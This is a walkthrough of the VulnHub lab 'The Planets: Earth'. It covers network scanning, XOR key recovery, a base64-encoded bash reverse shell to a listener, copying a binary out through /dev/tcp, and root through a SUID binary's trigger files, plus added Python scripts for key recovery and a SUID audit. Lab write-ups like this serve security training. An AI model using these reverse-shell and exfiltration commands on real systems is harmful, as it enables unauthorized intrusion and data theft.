VulnHub: The Planets: Earth

Today we will take a look at Vulnhub: The Planets: Earth. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC -oN result/nmap/log.txt --open 192.168.0.105

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)

I added these to my /etc/hosts file.

192.168.0.105   earth.local  terratest.earth.local

  • Web

After checking the links with gobuster, I found the robots.txt extension.

https://terratest.earth.local/robots.txt

Disallow: /testingnotes.*

When I looked at the testingnotes.txt extension, I found the username. In addition, how can I find the password?

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

https://terratest.earth.local/testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Now let’s decode with CyberChef. The notes say XOR was the algorithm and that testdata.txt was the test plaintext, and XOR is its own inverse: XOR-ing the encrypted test message with the testdata.txt text leaves nothing but the repeating key.

We found the username and password. Let’s go to the admin panel.

Username: terra

Password: earthclimatechangebad4humans
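The reason the note’s “should be safe as used in RSA” is wrong, as an added example (not from the walkthrough): with the testdata.txt plaintext known, XOR-ing it against its ciphertext strips the cipher and leaves the bare keystream, and the period of that keystream is the key. The script constructs a ciphertext from the page’s plaintext and key and recovers the key the same way CyberChef does.

```python
from itertools import cycle

# Constructed example: the known plaintext is the testdata.txt paragraph shown
# above; the key is the password the walkthrough recovered. The ciphertext is
# generated here, not copied from the box's admin panel.
KNOWN_PLAINTEXT = (b"According to radiometric dating estimation and other "
                   b"evidence, Earth formed over 4.5 billion years ago.")
KEY = b"earthclimatechangebad4humans"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, plaintext: bytes) -> bytes:
    """c XOR p == keystream, so a known plaintext strips the cipher entirely."""
    return bytes(c ^ p for c, p in zip(ciphertext, plaintext))


def shortest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i+p] for every i: the key length."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i + p] for i in range(len(stream) - p)):
            return p
    return len(stream)


def recover_key(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Known-plaintext recovery of a repeating XOR key.

    Needs known plaintext covering at least two key lengths so that the
    repetition (and therefore the key length) becomes visible.
    """
    keystream = recover_keystream(ciphertext, plaintext)
    return keystream[:shortest_period(keystream)]


if __name__ == "__main__":
    ct = xor_bytes(KNOWN_PLAINTEXT, KEY)
    print("ciphertext:", ct.hex())
    print("recovered key:", recover_key(ct, KNOWN_PLAINTEXT).decode())
```

A one-time key as long as the message would not leak this way; it is the reuse of a short key across messages, plus a known test plaintext, that hands the key over.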

  • Reverse shell

After giving the ‘ls’ command and checking, I saw that there was an executor of the command. Let’s get a shell.

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA3LzQyNDIgMD4mMQ== | base64 -d | bash

Don't forget to change the address: the base64 decodes to a bash reverse shell aimed at the listener's 192.168.0.107:4242.

On the listener:

└─$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.105] 50364
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$

  • Root

Command: find / -perm -u=s 2>/dev/null

One SUID binary that is not part of a standard install stands out:

/usr/bin/reset_root

Let’s transfer it to our machine and look at its contents.

In local machine:

Command: nc -nlvp 9002 > reset_root

In target machine:

cat /usr/bin/reset_root > /dev/tcp/192.168.0.107/9002

Now we can use ltrace to trace the library calls the ELF binary makes.

└─$ ltrace ./reset_root 
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++

The binary only checks, via access(), that three trigger files exist; if we create all three at the shown locations, the reset branch runs.

In the target machine:

touch /dev/shm/kHgTFI5G /dev/shm/Zw7bV9U5 /tmp/kcM0Wewe

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su root
su root
Password: Earth

And now we are root.
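The root cause is a setuid binary that takes its decision from files anyone can create in /dev/shm and /tmp. As an added defender's check (not part of the walkthrough or the box), this script extends the `find / -perm -u=s` step: it lists setuid/setgid binaries that embed path literals under world-writable directories, the pattern the ltrace output above exposed, with the three trigger paths from the page used in a constructed sample string table.

```python
import os
import re
import stat

# A setuid root program that branches on files in world-writable directories
# can be steered by any local user; reset_root does exactly that.
PATH_RE = re.compile(rb"/(?:tmp|var/tmp|dev/shm)/[\x21-\x7e]+")

# Constructed stand-in for the string table of a binary like reset_root,
# built from the three trigger paths the ltrace output revealed.
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01\x00CHECKING IF RESET TRIGGERS PRESENT...\x00"
               b"/dev/shm/kHgTFI5G\x00/dev/shm/Zw7bV9U5\x00/tmp/kcM0Wewe\x00"
               b"/etc/passwd\x00")


def suspicious_paths(blob: bytes) -> list:
    """Path literals under world-writable directories embedded in a binary."""
    return sorted({m.group().decode("ascii") for m in PATH_RE.finditer(blob)})


def is_setuid_or_setgid(path: str) -> bool:
    """True for regular files carrying the setuid or setgid bit (symlinks skipped)."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit(roots=("/usr/bin", "/usr/sbin", "/usr/local/bin")) -> dict:
    """Map each privileged binary under roots to the writable-dir paths it references."""
    findings = {}
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    if not is_setuid_or_setgid(full):
                        continue
                    with open(full, "rb") as fh:
                        hits = suspicious_paths(fh.read())
                except OSError:
                    continue  # unreadable or vanished file: skip, do not guess
                if hits:
                    findings[full] = hits
    return findings


if __name__ == "__main__":
    print("sample:", suspicious_paths(SAMPLE_BLOB))
    for binary, paths in audit().items():
        print(binary, "->", ", ".join(paths))
```

Hits are a triage list, not proof: a program may reference /tmp legitimately, so each finding still needs a look at how the path is used.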

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
